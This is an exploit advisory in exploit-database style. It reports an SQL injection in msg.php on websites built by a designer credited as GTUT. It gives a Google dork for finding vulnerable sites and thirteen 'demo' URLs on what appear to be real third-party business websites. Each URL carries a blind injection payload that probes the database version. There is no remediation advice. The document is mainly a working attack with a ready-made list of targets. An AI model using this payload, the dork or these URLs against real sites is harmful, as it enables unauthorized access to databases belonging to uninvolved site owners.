###################### # Exploit Title : Design by GTUT SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.gtut.com.tw/ # Google Dork : intext:"Design by GTUT" msg.php # Date: 28 01 2016 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # # demos : # http://www.flweb.com.tw/exec/msg.php?mid=1&cid=3 and(version() regexp CHAR/**/(94, 53))&mod=show&pid=13&lg=T # http://www.kmfsports.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.dacosemi.com.tw/exec/msg.php?mid=4&cid=4%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.ckoptics.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg&lg=E # http://www.rato.tw/exec/msg.php?mid=6&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=6&lg=E # http://www.stingray.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.nuzon.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.cyelectronic.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.tongson.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.lampweb.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E # http://www.songjin.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=T # http://www.chiemei.com/exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053)) # http://www.ygget.com/exec/msg.php?off=1&mid=36&cid=18%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=18&lg=S ###################### # discovered by : modiret ######################